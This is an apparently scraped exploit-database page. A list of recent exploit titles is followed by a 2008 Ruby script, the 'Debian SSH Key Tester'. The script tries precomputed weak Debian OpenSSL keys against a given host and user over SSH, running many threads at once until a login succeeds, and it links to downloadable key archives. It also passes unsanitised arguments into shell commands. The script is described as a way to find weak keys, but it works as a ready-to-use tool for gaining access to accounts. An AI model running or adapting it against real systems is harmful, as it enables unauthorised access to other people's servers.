
16 new exploits Adobe Flash - Metadata Parsing Out-of-Bounds Read Adobe Flash - MovieClip Attach init Object Use-After-Free Adobe Flash - ATF Thumbnailing Heap Overflow Adobe Flash - ATF Planar Decompression Heap Overflow Adobe Flash - AVC Header Slicing Heap Overflow Microsoft Windows - 'LoadUvsTable()' Heap-based Buffer Overflow USBPcap - Privilege Escalation USBPcap 1.1.0.0 (WireShark 2.2.5) - Privilege Escalation PCAUSA Rawether (ASUS PCE-AC56 WLAN Card Utilities Windows 10 x64) - Local Privilege Escalation Microsoft Windows - COM Session Moniker Privilege Escalation (MS17-012) Cisco Firepower Management Console 6.0 - Post Authentication UserAdd Cisco Firepower Management Console 6.0 - Post Authentication UserAdd (Metasploit) IBM WebSphere - RCE Java Deserialization (Metasploit) Apache Struts Jakarta - Multipart Parser OGNL Injection (Metasploit) Joomla! Component Vik Appointments 1.5 - SQL Injection Joomla! Component Vik Rent Items 1.3 - SQL Injection Joomla! Component Vik Rent Car 1.11 - SQL Injection GitHub Enterprise 2.8.0 < 2.8.6 - Remote Code Execution Steam Profile Integration 2.0.11 - SQL injection Sitecore CMS 8.1 Update-3 - Cross-Site Scripting
80 lines
No EOL
2.1 KiB
Ruby
Executable file
80 lines
No EOL
2.1 KiB
Ruby
Executable file
#!/usr/bin/ruby
|
|
#
|
|
# Debian SSH Key Tester
|
|
# L4teral <l4teral [at] gmail com>
|
|
#
|
|
# This tool helps to find user accounts with weak SSH keys
|
|
# that should be regenerated with an unaffected version
|
|
# of openssl.
|
|
#
|
|
# You will need the precalculated keys provided by HD Moore
|
|
# See http://metasploit.com/users/hdm/tools/debian-openssl/
|
|
# for further information.
|
|
#
|
|
# Common Keys:
|
|
#
|
|
# https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/5632.tar.bz2 (debian_ssh_dsa_1024_x86.tar.bz2)
|
|
# https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/5622.tar.bz2 (debian_ssh_rsa_2048_x86.tar.bz2)
|
|
#
|
|
#
|
|
# Usage:
|
|
# debian_openssh_key_test.rb <host> <user> <keydir>
|
|
#
|
|
# E-DB Note: See here for an update ~ https://github.com/offensive-security/exploit-database/pull/76/files
|
|
#
|
|
|
|
require 'thread'
|
|
|
|
THREADCOUNT = 10
|
|
KEYSPERCONNECT = 3
|
|
|
|
queue = Queue.new
|
|
threads = []
|
|
keyfiles = []
|
|
|
|
host = ARGV.shift or raise "no host given!"
|
|
user = ARGV.shift or raise "no user given!"
|
|
keysdir = ARGV.shift or raise "no key dir given!"
|
|
|
|
Dir.new(keysdir).each do |f|
|
|
if f =~ /\d+$/ then
|
|
keyfiles << f
|
|
queue << f
|
|
end
|
|
end
|
|
|
|
totalkeys = queue.length
|
|
currentkey = 1
|
|
|
|
THREADCOUNT.times do |i|
|
|
threads << Thread.new(i) do |j|
|
|
while !queue.empty?
|
|
keys = []
|
|
KEYSPERCONNECT.times { keys << queue.pop unless queue.empty? }
|
|
keys.map! { |f| f = File.join(keysdir, f) }
|
|
keys.each do |k|
|
|
puts "testing key #{currentkey}/#{totalkeys} #{k}..."
|
|
currentkey += 1
|
|
end
|
|
system "ssh -l #{user} -o PasswordAuthentication=no -i #{keys.join(" -i ")} #{host} \"exit\" &>/dev/null"
|
|
if $? == 0 then
|
|
keys.each do |k|
|
|
system "ssh -l #{user} -o PasswordAuthentication=no -i #{k} #{host} \"exit\" &>/dev/null"
|
|
if $? == 0 then
|
|
puts "KEYFILE FOUND: \n#{k}"
|
|
exit
|
|
end
|
|
end
|
|
end
|
|
end
|
|
end
|
|
end
|
|
|
|
trap("SIGINT") do
|
|
threads.each { |t| t.exit() }
|
|
exit
|
|
end
|
|
|
|
threads.each { |t| t.join }
|
|
|
|
# milw0rm.com [2008-05-16] |